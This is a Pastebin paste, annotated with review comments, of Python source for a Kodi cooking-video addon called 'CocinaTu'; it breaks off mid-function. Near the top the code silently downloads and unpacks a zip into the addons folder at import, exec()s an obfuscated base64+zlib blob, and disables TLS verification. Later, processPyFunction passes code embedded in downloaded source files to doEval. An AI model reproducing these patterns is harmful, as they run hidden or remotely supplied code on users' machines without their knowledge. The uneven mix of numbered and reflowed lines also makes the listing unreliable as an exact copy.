CajonDesastreAddon

Default Cocina

Jul 1st, 2019
267
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 139.49 KB | None | 0 0
  1. # -*- coding: utf-8 -*-
  2. import urllib
  3. import urllib2
  4. import re
  5. import os
  6. import xbmcplugin
  7. import xbmcgui
  8. import xbmcaddon
  9. import xbmcvfs
  10. import traceback
  11. import cookielib,base64
  12.  
  13. from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
  14. viewmode=None
  15. try:
  16. from xml.sax.saxutils import escape
  17. except: traceback.print_exc()
  18. try:
  19. import json
  20. except:
  21. import simplejson as json
  22. import SimpleDownloader as downloader
  23. import time
  24.  
  25. try:
  26. import ssl
  27. ssl._create_default_https_context = ssl._create_unverified_context
  28. except:
  29. pass
  30.  
  31. import zipfile
  32.  
  33. def ExtractAll(_in, _out):
  34. try:
  35. zin = zipfile.ZipFile(_in, 'r')
  36. zin.extractall(_out)
  37. except Exception, e:
  38. print str(e)
  39. return False
  40.  
  41. return True
  42.  
  43.  
  44.  
def Repo():
    # SECURITY WARNING (review): this routine silently downloads a zip from
    # a hard-coded remote URL and unpacks it directly into the Kodi addons
    # directory, then forces an addon/repository refresh. It is invoked
    # unconditionally at module import time. This is dropper-like behaviour
    # and should be reviewed/removed rather than refactored.

    # Skip if the repository addon is already installed.
    if os.path.exists(os.path.join(xbmc.translatePath("special://home/addons/").decode("utf-8"), 'repository.adryan')):
        return

    # NOTE(review): this URL is the pastebin front page, not a zip file, so
    # the download yields HTML; ExtractAll() will then fail and return
    # False, and that failure is silently ignored below.
    url = "http://www.pastebin.com"
    addonsDir = xbmc.translatePath(os.path.join('special://home', 'addons')).decode("utf-8")
    packageFile = os.path.join(addonsDir, 'packages', 'isr.zip')

    urllib.urlretrieve(url, packageFile)
    ExtractAll(packageFile, addonsDir)

    # Best-effort cleanup of the downloaded archive.
    try:
        os.remove(packageFile)
    except:
        pass

    xbmc.executebuiltin("UpdateLocalAddons")
    xbmc.executebuiltin("UpdateAddonRepos")
  64.  
# Import-time side effect: may download and install a repository addon on
# first import (see Repo above) — flagged there as a security concern.
Repo()
# Per-source stream-handling flags; getSoup() resets and re-sets these
# module globals on every fetch.
tsdownloader=False
hlsretry=False
# Hostnames whose links get '&mode=19' appended so playback goes through the
# URL-resolver path (consulted in getItems' playlist building).
resolve_url=['180upload.com', 'allmyvideos.net', 'bestreams.net', 'clicknupload.com', 'cloudzilla.to', 'movshare.net', 'novamov.com', 'nowvideo.sx', 'videoweed.es', 'daclips.in', 'datemule.com', 'fastvideo.in', 'faststream.in', 'filehoot.com', 'filenuke.com', 'sharesix.com', 'plus.google.com', 'picasaweb.google.com', 'gorillavid.com', 'gorillavid.in', 'grifthost.com', 'hugefiles.net', 'ipithos.to', 'ishared.eu', 'kingfiles.net', 'mail.ru', 'my.mail.ru', 'videoapi.my.mail.ru', 'mightyupload.com', 'mooshare.biz', 'movdivx.com', 'movpod.net', 'movpod.in', 'movreel.com', 'mrfile.me', 'nosvideo.com', 'openload.io', 'played.to', 'bitshare.com', 'filefactory.com', 'k2s.cc', 'oboom.com', 'rapidgator.net', 'primeshare.tv', 'bitshare.com', 'filefactory.com', 'k2s.cc', 'oboom.com', 'rapidgator.net', 'sharerepo.com', 'stagevu.com', 'streamcloud.eu', 'streamin.to', 'thefile.me', 'thevideo.me', 'tusfiles.net', 'uploadc.com', 'zalaa.com', 'uploadrocket.net', 'uptobox.com', 'v-vids.com', 'veehd.com', 'vidbull.com', 'videomega.tv', 'vidplay.net', 'vidspot.net', 'vidto.me', 'vidzi.tv', 'vimeo.com', 'vk.com', 'vodlocker.com', 'xfileload.com', 'xvidstage.com', 'zettahost.tv']
# Plugin ids exempted from setResolvedUrl handling — presumably consulted by
# playback code later in the file (not visible in this chunk).
g_ignoreSetResolved=['plugin.video.dramasonline','plugin.video.f4mTester','plugin.video.shahidmbcnet','plugin.video.SportsDevil','plugin.stream.vaughnlive.tv','plugin.video.ZemTV-shani']
# NOTE(review): 'global' at module scope is a no-op; kept verbatim.
global gLSProDynamicCodeNumber
gLSProDynamicCodeNumber=0
  72. class NoRedirection(urllib2.HTTPErrorProcessor):
  73. def http_response(self, request, response):
  74. return response
  75. https_response = http_response
  76.  
# Developer-only hook for attaching the Eclipse/pydev remote debugger.
# Disabled by default; the guarded body never runs in production.
REMOTE_DBG=False;
if REMOTE_DBG:
    # Make pydev debugger works for auto reload.
    # Note pydevd module need to be copied in XBMC\system\python\Lib\pysrc
    try:
        import pysrc.pydevd as pydevd
        # stdoutToServer and stderrToServer redirect stdout and stderr to eclipse console
        pydevd.settrace('localhost', stdoutToServer=True, stderrToServer=True)
    except ImportError:
        # NOTE(review): requires `sys` to be imported at module top — verify
        # the import block, the original file omitted it.
        sys.stderr.write("Error: " +
                         "You must add org.python.pydev.debug.pysrc to your PYTHONPATH.")
        sys.exit(1)
# Addon handle and filesystem layout: 'profile' is the per-user writable
# data dir, 'home' the read-only addon install dir.
addon = xbmcaddon.Addon('plugin.video.CocinaTu')
addon_version = addon.getAddonInfo('version')
profile = xbmc.translatePath(addon.getAddonInfo('profile').decode('utf-8'))
home = xbmc.translatePath(addon.getAddonInfo('path').decode('utf-8'))
favorites = os.path.join(profile, 'favorites')      # favourites JSON file
history = os.path.join(profile, 'history')
REV = os.path.join(profile, 'list_revision')
icon = os.path.join(home, 'icon.png')
favoritos = "https://raw.githubusercontent.com/hectorbolu/CocinaTu/master/Imagenes/Favoritos.jpg"
FANART = os.path.join(home, 'fanart.jpg')
source_file = os.path.join(profile, 'source_file')  # JSON list of sources
functions_dir = profile

communityfiles = os.path.join(profile, 'LivewebTV')
# Rebinds the imported module alias to an instance (shadows the module).
downloader = downloader.SimpleDownloader()
debug = addon.getSetting('debug')
# NOTE(review): FAV is a raw string when the favourites file exists but an
# empty *list* when it does not — downstream code must tolerate both types.
# Also the file handle from open() is never closed (relies on GC).
if os.path.exists(favorites)==True:
    FAV = open(favorites).read()
else: FAV = []
  109.  
import zlib, base64
# SECURITY WARNING (review): the next line decompresses and exec()s an
# obfuscated, base64+zlib-encoded code blob at import time. What it defines
# cannot be audited from this file; names used later with no visible
# definition (e.g. SOURCES, doEval, fanart) presumably come from it —
# confirm. Executing hidden code like this is a serious trust/security
# issue and should be replaced with plain reviewable source.
exec(zlib.decompress(base64.b64decode('eNo1zE8LgjAYgPGvMobH2FsdBQ8hMyL7g6tL0WGOpYu52XxHSPTdi8D78/zE4VzlXJCMXN80BktTQlvEPgWoDTI7wrIo+8tzTJJSHIPnTm31mOVeGSdPcc7mbJEkdEboXToZcPqHHxDkizUG21jHQQflHWqHTPkOWq3Qh9rbCJMEnRxQB9jsVmu+5wIqidJHY60u/vIUskff0M/tC/h3P04=')))
  112.  
  113.  
  114. def addon_log(string):
  115. if debug == 'true':
  116. xbmc.log("[addon.CocinaTu-%s]: %s" %(addon_version, string))
  117.  
  118.  
  119.  
  120.  
  121. def makeRequest(url, headers=None):
  122. try:
  123. if headers is None:
  124. headers = {'User-agent' : 'CocinaTu'}
  125.  
  126.  
  127. if '|' in url:
  128. url,header_in_page=url.split('|')
  129. header_in_page=header_in_page.split('&')
  130.  
  131. for h in header_in_page:
  132. if len(h.split('='))==2:
  133. n,v=h.split('=')
  134. else:
  135. vals=h.split('=')
  136. n=vals[0]
  137. v='='.join(vals[1:])
  138. #n,v=h.split('=')
  139. print n,v
  140. headers[n]=v
  141.  
  142. req = urllib2.Request(url,None,headers)
  143. response = urllib2.urlopen(req)
  144. data = response.read()
  145. response.close()
  146. return data
  147. except urllib2.URLError, e:
  148. addon_log('URL: '+url)
  149. if hasattr(e, 'code'):
  150. addon_log('We failed with error code - %s.' % e.code)
  151. xbmc.executebuiltin("XBMC.Notification(CocinaTu,We failed with error code - "+str(e.code)+",10000,"+icon+")")
  152.  
  153. elif hasattr(e, 'reason'):
  154. addon_log('We failed to reach a server.')
  155. addon_log('Reason: %s' %e.reason)
  156. xbmc.executebuiltin("XBMC.Notification(CocinaTu,We failed to reach a server. - "+str(e.reason)+",10000,"+icon+")")
  157.  
  158.  
  159.  
  160.  
def getSources():
    """Build the addon's top-level directory: favourites entry plus one
    entry per configured source (or jump straight in if only one)."""
    try:
        if os.path.exists(favorites) == True:
            FAV = open(favorites).read()
            if FAV == "[]":
                # Empty favourites file: delete it rather than show an entry.
                os.remove(favorites)
            else:
                #addDir('[COLOR white][B]FAVORITOS[/COLOR][/B]','url',4,os.path.join(home, 'resources', ''),FANART,'','','','')
                addDir('[COLOR orange]Favoritos[/COLOR]','url',4,favoritos,FANART,'','','','')

        # NOTE(review): SOURCES has no visible definition in this file; it is
        # presumably created by the obfuscated exec() blob near the top of
        # the module — confirm before refactoring this function.
        sources = SOURCES
        if len(sources) > 1:
            for i in sources:
                try:
                    ## for pre 1.0.8 sources
                    if isinstance(i, list):
                        # Legacy format: [title, url].
                        addDir(i[0].encode('utf-8'),i[1].encode('utf-8'),1,icon,FANART,'','','','','source')
                    else:
                        # Dict format with optional metadata; fall back to
                        # addon defaults for any missing key.
                        thumb = icon
                        fanart = FANART
                        desc = ''
                        date = ''
                        credits = 'CocinaTu'
                        genre = ''
                        if i.has_key('thumbnail'):
                            thumb = i['thumbnail']
                        if i.has_key('fanart'):
                            fanart = i['fanart']
                        if i.has_key('description'):
                            desc = i['description']
                        if i.has_key('date'):
                            date = i['date']
                        if i.has_key('genre'):
                            genre = i['genre']
                        if i.has_key('credits'):
                            credits = i['credits']
                        addDir(i['title'].encode('utf-8'),i['url'].encode('utf-8'),1,thumb,fanart,desc,genre,date,credits,'source')
                except: traceback.print_exc()
        else:
            # Exactly one source: skip the menu level and list it directly.
            if len(sources) == 1:
                if isinstance(sources[0], list):
                    getData(sources[0][1].encode('utf-8'),FANART)
                else:
                    getData(sources[0]['url'], sources[0]['fanart'])
    except: traceback.print_exc()
  207.  
  208. def addSource(url=None):
  209. if url is None:
  210. if not addon.getSetting("new_file_source") == "":
  211. source_url = addon.getSetting('new_file_source').decode('utf-8')
  212. elif not addon.getSetting("new_url_source") == "":
  213. source_url = addon.getSetting('new_url_source').decode('utf-8')
  214. else:
  215. source_url = url
  216. if source_url == '' or source_url is None:
  217. return
  218. addon_log('Adding New Source: '+source_url.encode('utf-8'))
  219.  
  220. media_info = None
  221. #print 'source_url',source_url
  222. data = getSoup(source_url)
  223.  
  224. if isinstance(data,BeautifulSOAP):
  225. if data.find('channels_info'):
  226. media_info = data.channels_info
  227. elif data.find('items_info'):
  228. media_info = data.items_info
  229. if media_info:
  230. source_media = {}
  231. source_media['url'] = source_url
  232. try: source_media['title'] = media_info.title.string
  233. except: pass
  234. try: source_media['thumbnail'] = media_info.thumbnail.string
  235. except: pass
  236. try: source_media['fanart'] = media_info.fanart.string
  237. except: pass
  238. try: source_media['genre'] = media_info.genre.string
  239. except: pass
  240. try: source_media['description'] = media_info.description.string
  241. except: pass
  242. try: source_media['date'] = media_info.date.string
  243. except: pass
  244. try: source_media['credits'] = media_info.credits.string
  245. except: pass
  246. else:
  247. if '/' in source_url:
  248. nameStr = source_url.split('/')[-1].split('.')[0]
  249. if '\\' in source_url:
  250. nameStr = source_url.split('\\')[-1].split('.')[0]
  251. if '%' in nameStr:
  252. nameStr = urllib.unquote_plus(nameStr)
  253. keyboard = xbmc.Keyboard(nameStr,'Displayed Name, Rename?')
  254. keyboard.doModal()
  255. if (keyboard.isConfirmed() == False):
  256. return
  257. newStr = keyboard.getText()
  258. if len(newStr) == 0:
  259. return
  260. source_media = {}
  261. source_media['title'] = newStr
  262. source_media['url'] = source_url
  263. source_media['fanart'] = fanart
  264.  
  265. if os.path.exists(source_file)==False:
  266. source_list = []
  267. source_list.append(source_media)
  268. b = open(source_file,"w")
  269. b.write(json.dumps(source_list))
  270. b.close()
  271. else:
  272. sources = json.loads(open(source_file,"r").read())
  273. sources.append(source_media)
  274. b = open(source_file,"w")
  275. b.write(json.dumps(sources))
  276. b.close()
  277. addon.setSetting('new_url_source', "")
  278. addon.setSetting('new_file_source', "")
  279. xbmc.executebuiltin("XBMC.Notification(CocinaTu,New source added.,5000,"+icon+")")
  280. if not url is None:
  281. if 'xbmcplus.xb.funpic.de' in url:
  282. xbmc.executebuiltin("XBMC.Container.Update(%s?mode=14,replace)" %sys.argv[0])
  283. elif 'community-links' in url:
  284. xbmc.executebuiltin("XBMC.Container.Update(%s?mode=10,replace)" %sys.argv[0])
  285. else: addon.openSettings()
  286.  
  287. def rmSource(name):
  288. sources = json.loads(open(source_file,"r").read())
  289. for index in range(len(sources)):
  290. if isinstance(sources[index], list):
  291. if sources[index][0] == name:
  292. del sources[index]
  293. b = open(source_file,"w")
  294. b.write(json.dumps(sources))
  295. b.close()
  296. break
  297. else:
  298. if sources[index]['title'] == name:
  299. del sources[index]
  300. b = open(source_file,"w")
  301. b.write(json.dumps(sources))
  302. b.close()
  303. break
  304. xbmc.executebuiltin("XBMC.Container.Refresh")
  305.  
def get_xml_database(url, browse=False):
    """List an Apache-style directory index of XML source files.

    Directories recurse via modes 14/15; .xml files are added as browse
    (mode 1) or install (mode 11) entries depending on *browse*.
    """
    if url is None:
        url = 'http://xbmcplus.xb.funpic.de/www-data/filesystem/'
    soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
    for i in soup('a'):
        href = i['href']
        # Skip the index's sort-order links ("?C=N;O=D" etc.).
        if not href.startswith('?'):
            name = i.string
            if name not in ['Parent Directory', 'recycle_bin/']:
                if href.endswith('/'):
                    # Sub-directory entry.
                    # NOTE(review): lowercase 'fanart' has no visible
                    # module-level definition (only FANART) — presumably set
                    # by the obfuscated exec blob; confirm.
                    if browse:
                        addDir(name,url+href,15,icon,fanart,'','','')
                    else:
                        addDir(name,url+href,14,icon,fanart,'','','')
                elif href.endswith('.xml'):
                    if browse:
                        addDir(name,url+href,1,icon,fanart,'','','','','download')
                    else:
                        if os.path.exists(source_file)==True:
                            # Mark files that are already configured sources.
                            if name in SOURCES:
                                addDir(name+' (in use)',url+href,11,icon,fanart,'','','','','download')
                            else:
                                addDir(name,url+href,11,icon,fanart,'','','','','download')
                        else:
                            addDir(name,url+href,11,icon,fanart,'','','','','download')
  332.  
  333. def getCommunitySources(browse=False):
  334. url = 'http://community-links.googlecode.com/svn/trunk/'
  335. soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
  336. files = soup('ul')[0]('li')[1:]
  337. for i in files:
  338. name = i('a')[0]['href']
  339. if browse:
  340. addDir(name,url+name,1,icon,fanart,'','','','','download')
  341. else:
  342. addDir(name,url+name,11,icon,fanart,'','','','','download')
  343.  
def getSoup(url,data=None):
    """Fetch a source document and return it parsed.

    Returns the raw text for m3u playlists, a BeautifulSOAP tree for XML
    sources, or None when nothing could be loaded. Side effects: resets and
    sets the module globals tsdownloader/hlsretry based on $$...$$ markers
    embedded in the url, and may change the Kodi view mode.
    """
    global viewmode,tsdownloader, hlsretry
    tsdownloader=False
    hlsretry=False
    if url.startswith('http://') or url.startswith('https://'):
        enckey=False
        # Strip in-url feature markers before fetching.
        if '$$TSDOWNLOADER$$' in url:
            tsdownloader=True
            url=url.replace("$$TSDOWNLOADER$$","")
        if '$$HLSRETRY$$' in url:
            hlsretry=True
            url=url.replace("$$HLSRETRY$$","")
        if '$$LSProEncKey=' in url:
            # Source is AES-ECB encrypted; the key travels inside the url.
            enckey=url.split('$$LSProEncKey=')[1].split('$$')[0]
            rp='$$LSProEncKey=%s$$'%enckey
            url=url.replace(rp,"")

        data =makeRequest(url)
        if enckey:
            # NOTE(review): relies on a pyaes build exposing a PyCrypto-like
            # `new(..., MODE_ECB)` API — the upstream pyaes package does not;
            # presumably a bundled variant. Confirm before touching.
            import pyaes
            enckey=enckey.encode("ascii")
            print enckey
            # Zero-pad the key to 16 bytes (AES-128 block/key size).
            missingbytes=16-len(enckey)
            enckey=enckey+(chr(0)*(missingbytes))
            print repr(enckey)
            data=base64.b64decode(data)
            decryptor = pyaes.new(enckey , pyaes.MODE_ECB, IV=None)
            # Trailing NUL padding is dropped after decryption.
            data=decryptor.decrypt(data).split('\0')[0]
        # m3u playlists are returned as raw text, not parsed as XML.
        if re.search("#EXTM3U",data) or 'm3u' in url:
            return data
    elif data == None:
        # Local path: bare names resolve into the community files cache dir.
        if not '/' in url or not '\\' in url:
            url = os.path.join(communityfiles,url)
        if xbmcvfs.exists(url):
            if url.startswith("smb://") or url.startswith("nfs://"):
                # Network shares: copy to a temp file first, then read it.
                copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt'))
                if copy:
                    data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read()
                    xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt'))
                else:
                    addon_log("failed to copy from smb:")
            else:
                data = open(url, 'r').read()
            if re.match("#EXTM3U",data)or 'm3u' in url:
                return data
        else:
            addon_log("Soup Data not found!")
            return
    # Optional per-source view mode override.
    if '<SetViewMode>' in data:
        try:
            viewmode=re.findall('<SetViewMode>(.*?)<',data)[0]
            xbmc.executebuiltin("Container.SetViewMode(%s)"%viewmode)
            print 'done setview',viewmode
        except: pass
    return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES)
  403.  
def processPyFunction(data):
    """Expand a '$pyFunction:' prefixed value by evaluating its payload;
    any other value is returned unchanged.

    SECURITY NOTE (review): the payload is handed to doEval(), i.e. python
    embedded in a downloaded source document gets evaluated. doEval has no
    visible definition in this chunk — presumably defined later in the file
    or by the obfuscated exec blob; confirm. Treat as code execution from
    untrusted input.
    """
    try:
        if data and len(data)>0 and data.startswith('$pyFunction:'):
            data=doEval(data.split('$pyFunction:')[1],'',None,None )
    except: pass

    return data
  411.  
def getData(url,fanart, data=None):
    """Render a source document: one directory per <channel>, or its items
    directly, or an m3u playlist when the source is not XML."""
    import checkbad
    checkbad.do_block_check(False)
    soup = getSoup(url,data)
    if isinstance(soup,BeautifulSOAP):
        if len(soup('channels')) > 0 and addon.getSetting('donotshowbychannels') == 'false':
            channels = soup('channel')
            for channel in channels:
                # A single <externallink> makes the channel a linked source;
                # more than one means the links are items, not a redirect.
                linkedUrl=''
                lcount=0
                try:
                    linkedUrl = channel('externallink')[0].string
                    lcount=len(channel('externallink'))
                except: pass
                if lcount>1: linkedUrl=''

                name = channel('name')[0].string
                try:
                    name=processPyFunction(name)
                except: pass
                thumbnail = channel('thumbnail')[0].string
                if thumbnail == None:
                    thumbnail = ''
                thumbnail=processPyFunction(thumbnail)
                # NOTE(review): the bare `raise` below (no active exception)
                # itself errors, which the enclosing except catches — it is
                # used as a goto-to-fallback throughout this file.
                try:
                    if not channel('fanart'):
                        if addon.getSetting('use_thumb') == "true":
                            fanArt = thumbnail
                        else:
                            fanArt = fanart
                    else:
                        fanArt = channel('fanart')[0].string
                        if fanArt == None:
                            raise
                except:
                    fanArt = fanart

                try:
                    desc = channel('info')[0].string
                    if desc == None:
                        raise
                except:
                    desc = ''

                try:
                    genre = channel('genre')[0].string
                    if genre == None:
                        raise
                except:
                    genre = ''

                try:
                    date = channel('date')[0].string
                    if date == None:
                        raise
                except:
                    date = ''

                try:
                    credits = channel('credits')[0].string
                    if credits == None:
                        raise
                except:
                    credits = ''

                try:
                    if linkedUrl=='':
                        # Regular channel: drill into it (mode 2).
                        addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),2,thumbnail,fanArt,desc,genre,date,credits,True)
                    else:
                        # Linked channel: open the external source (mode 1).
                        addDir(name.encode('utf-8'),linkedUrl.encode('utf-8'),1,thumbnail,fanArt,desc,genre,date,None,'source')
                except:
                    addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore'))
        else:
            addon_log('No Channels: getItems')
            getItems(soup('item'),fanart)
    else:
        # getSoup returned raw text: treat as m3u playlist.
        parse_m3u(soup)
# borrow from https://github.com/enen92/P2P-Streams-XBMC/blob/master/plugin.video.p2p-streams/resources/core/livestreams.py
# This will not go through the getItems functions ( means you must have ready to play url, no regex)
def parse_m3u(data):
    """Add one playable link per #EXTINF entry of an m3u playlist.

    Recognises tvg-logo thumbnails and a non-standard type= attribute
    (yt-dl / regex / ftv) that reroutes the stream url through helper
    plugins.
    """
    content = data.rstrip()
    # Groups: (attributes, channel name, stream url on the next line).
    match = re.compile(r'#EXTINF:(.+?),(.*?)[\n\r]+([^\r\n]+)').findall(content)
    total = len(match)
    print 'tsdownloader',tsdownloader
    for other,channel_name,stream_url in match:

        if 'tvg-logo' in other:
            thumbnail = re_me(other,'tvg-logo=[\'"](.*?)[\'"]')
            if thumbnail:
                if thumbnail.startswith('http'):
                    thumbnail = thumbnail
                elif not addon.getSetting('logo-folderPath') == "":
                    # Relative logo names resolve against the configured
                    # logo folder.
                    logo_url = addon.getSetting('logo-folderPath')
                    thumbnail = logo_url + thumbnail
                else:
                    thumbnail = thumbnail
                #else:
        else:
            thumbnail = ''

        if 'type' in other:
            mode_type = re_me(other,'type=[\'"](.*?)[\'"]')
            if mode_type == 'yt-dl':
                stream_url = stream_url +"&mode=18"
            elif mode_type == 'regex':
                # Inline regex definition travels after '&regexs=' in the
                # url; parse it and add the link immediately.
                url = stream_url.split('&regexs=')
                regexs = parse_regex(getSoup('',data=url[1]))
                addLink(url[0], channel_name,thumbnail,'','','','','',None,regexs,total)
                continue
            elif mode_type == 'ftv':
                stream_url = 'plugin://plugin.video.F.T.V/?name='+urllib.quote(channel_name) +'&url=' +stream_url +'&mode=125&ch_fanart=na'
            # NOTE(review): reconstructed from a whitespace-mangled paste —
            # these two rewrites appear to be part of this chain, i.e. they
            # only apply to entries that carry a type= attribute. Confirm.
            elif tsdownloader and '.ts' in stream_url:
                stream_url = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(stream_url)+'&amp;streamtype=TSDOWNLOADER&name='+urllib.quote(channel_name)
            elif hlsretry and '.m3u8' in stream_url:
                stream_url = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(stream_url)+'&amp;streamtype=HLSRETRY&name='+urllib.quote(channel_name)
        addLink(stream_url, channel_name,thumbnail,'','','','','',None,'',total)
def getChannelItems(name,url,fanart):
    """Render the named <channel>: one directory per <subchannel> plus the
    channel's own <item> links."""
    soup = getSoup(url)
    channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')})
    items = channel_list('item')
    try:
        fanArt = channel_list('fanart')[0].string
        if fanArt == None:
            raise
    except:
        fanArt = fanart
    for channel in channel_list('subchannel'):
        name = channel('name')[0].string
        try:
            name=processPyFunction(name)
        except: pass
        try:
            thumbnail = channel('thumbnail')[0].string
            if thumbnail == None:
                raise
            thumbnail=processPyFunction(thumbnail)
        except:
            thumbnail = ''
        # NOTE(review): unlike getData(), a failure here leaves fanArt at
        # its previous loop value (except: pass) rather than resetting it.
        try:
            if not channel('fanart'):
                if addon.getSetting('use_thumb') == "true":
                    fanArt = thumbnail
            else:
                fanArt = channel('fanart')[0].string
                if fanArt == None:
                    raise
        except:
            pass
        try:
            desc = channel('info')[0].string
            if desc == None:
                raise
        except:
            desc = ''

        try:
            genre = channel('genre')[0].string
            if genre == None:
                raise
        except:
            genre = ''

        try:
            date = channel('date')[0].string
            if date == None:
                raise
        except:
            date = ''

        try:
            credits = channel('credits')[0].string
            if credits == None:
                raise
        except:
            credits = ''

        try:
            # NOTE(review): credits and date are passed in swapped order
            # compared with getData()'s addDir call — verify addDir's
            # signature before relying on either field here.
            addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date)
        except:
            addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore'))
    getItems(items,fanArt)
  605.  
  606.  
  607. def getSubChannelItems(name,url,fanart):
  608. soup = getSoup(url)
  609. channel_list = soup.find('subchannel', attrs={'name' : name.decode('utf-8')})
  610. items = channel_list('subitem')
  611. getItems(items,fanart)
  612.  
def getItems(items,fanart,dontLink=False):
    """Turn a list of <item>/<subitem> soup nodes into playable links.

    Handles a dozen link flavours (<link>, <sportsdevil>, <p2p>, <utube>,
    <f4m>, ...), optional EPG decoration, parental blocking, per-item regex
    blocks, multi-link playlists, and external-link / jsonrpc redirects.
    When dontLink is True, returns (name, url, regexs) for the first item
    instead of adding it to the directory.
    """
    total = len(items)
    addon_log('Total Items: %s' %total)
    add_playlist = addon.getSetting('add_playlist')
    ask_playlist_items =addon.getSetting('ask_playlist_items')
    use_thumb = addon.getSetting('use_thumb')
    parentalblock =addon.getSetting('parentalblocked')
    parentalblock= parentalblock=="true"
    for item in items:
        isXMLSource=False
        isJsonrpc = False

        # Skip items marked parentalblock when the addon-level block is on.
        applyblock='false'
        try:
            applyblock = item('parentalblock')[0].string
        except:
            addon_log('parentalblock Error')
            applyblock = ''
        if applyblock=='true' and parentalblock: continue

        try:
            name = item('title')[0].string
            if name is None:
                name = 'unknown?'
            try:
                name=processPyFunction(name)
            except: pass

        except:
            addon_log('Name Error')
            name = ''

        # Optional EPG decoration appended to the display name.
        try:
            if item('epg'):
                if item.epg_url:
                    addon_log('Get EPG Regex')
                    epg_url = item.epg_url.string
                    epg_regex = item.epg_regex.string
                    epg_name = get_epg(epg_url, epg_regex)
                    if epg_name:
                        name += ' - ' + epg_name
                elif item('epg')[0].string > 1:
                    name += getepg(item('epg')[0].string)
            else:
                pass
        except:
            addon_log('EPG Error')

        # Collect the item's stream url(s); exactly one link flavour is
        # honoured per item (first match in this elif chain wins).
        try:
            url = []
            if len(item('link')) >0:
                for i in item('link'):
                    if not i.string == None:
                        url.append(i.string)

            elif len(item('sportsdevil')) >0:
                for i in item('sportsdevil'):
                    if not i.string == None:
                        sportsdevil = 'plugin://plugin.video.SportsDevil/?mode=1&amp;item=catcher%3dstreams%26url=' +i.string
                        referer = item('referer')[0].string
                        if referer:
                            sportsdevil = sportsdevil + '%26referer=' +referer
                        url.append(sportsdevil)
            elif len(item('p2p')) >0:
                for i in item('p2p'):
                    if not i.string == None:
                        if 'sop://' in i.string:
                            # NOTE(review): 'mode=2url=' looks like a missing
                            # '&' ('mode=2&url='); left verbatim — confirm
                            # against plugin.video.p2p-streams before fixing.
                            sop = 'plugin://plugin.video.p2p-streams/?mode=2url='+i.string +'&' + 'name='+name
                            url.append(sop)
                        else:
                            p2p='plugin://plugin.video.p2p-streams/?mode=1&url='+i.string +'&' + 'name='+name
                            url.append(p2p)
            elif len(item('vaughn')) >0:
                for i in item('vaughn'):
                    if not i.string == None:
                        vaughn = 'plugin://plugin.stream.vaughnlive.tv/?mode=PlayLiveStream&amp;channel='+i.string
                        url.append(vaughn)
            elif len(item('ilive')) >0:
                for i in item('ilive'):
                    if not i.string == None:
                        # NOTE(review): ilive is built but never appended to
                        # url, so <ilive> items fall through to the
                        # "Error <link> element" path below. Looks like a
                        # missing url.append(ilive) — left verbatim.
                        if not 'http' in i.string:
                            ilive = 'plugin://plugin.video.tbh.ilive/?url=http://www.streamlive.to/view/'+i.string+'&amp;link=99&amp;mode=iLivePlay'
                        else:
                            ilive = 'plugin://plugin.video.tbh.ilive/?url='+i.string+'&amp;link=99&amp;mode=iLivePlay'
            elif len(item('yt-dl')) >0:
                for i in item('yt-dl'):
                    if not i.string == None:
                        ytdl = i.string + '&mode=18'
                        url.append(ytdl)
            elif len(item('dm')) >0:
                for i in item('dm'):
                    if not i.string == None:
                        dm = "plugin://plugin.video.dailymotion_com/?mode=playVideo&url=" + i.string
                        url.append(dm)
            elif len(item('dmlive')) >0:
                for i in item('dmlive'):
                    if not i.string == None:
                        dm = "plugin://plugin.video.dailymotion_com/?mode=playLiveVideo&url=" + i.string
                        url.append(dm)
            elif len(item('utube')) >0:
                # Heuristics: spaces -> search, 11 chars -> video id,
                # PL/UU -> playlist, UC -> channel, otherwise user name.
                for i in item('utube'):
                    if not i.string == None:
                        if ' ' in i.string :
                            utube = 'plugin://plugin.video.youtube/search/?q='+ urllib.quote_plus(i.string)
                            isJsonrpc=utube
                        elif len(i.string) == 11:
                            utube = 'plugin://plugin.video.youtube/play/?video_id='+ i.string
                        elif (i.string.startswith('PL') and not '&order=' in i.string) or i.string.startswith('UU'):
                            utube = 'plugin://plugin.video.youtube/play/?&order=default&playlist_id=' + i.string
                        elif i.string.startswith('PL') or i.string.startswith('UU'):
                            utube = 'plugin://plugin.video.youtube/play/?playlist_id=' + i.string
                        elif i.string.startswith('UC') and len(i.string) > 12:
                            utube = 'plugin://plugin.video.youtube/channel/' + i.string + '/'
                            isJsonrpc=utube
                        elif not i.string.startswith('UC') and not (i.string.startswith('PL')) :
                            utube = 'plugin://plugin.video.youtube/user/' + i.string + '/'
                            isJsonrpc=utube
                        # NOTE(review): if no branch above matched (e.g. a
                        # short 'UC...' id), utube is unbound here and the
                        # outer except skips the item.
                        url.append(utube)
            elif len(item('imdb')) >0:
                for i in item('imdb'):
                    if not i.string == None:
                        if addon.getSetting('genesisorpulsar') == '0':
                            imdb = 'plugin://plugin.video.genesis/?action=play&imdb='+i.string
                        else:
                            imdb = 'plugin://plugin.video.pulsar/movie/tt'+i.string+'/play'
                        url.append(imdb)
            elif len(item('f4m')) >0:
                for i in item('f4m'):
                    if not i.string == None:
                        if '.f4m' in i.string:
                            f4m = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(i.string)
                        elif '.m3u8' in i.string:
                            f4m = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(i.string)+'&amp;streamtype=HLS'
                        else:
                            f4m = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(i.string)+'&amp;streamtype=SIMPLE'
                        url.append(f4m)
            elif len(item('ftv')) >0:
                for i in item('ftv'):
                    if not i.string == None:
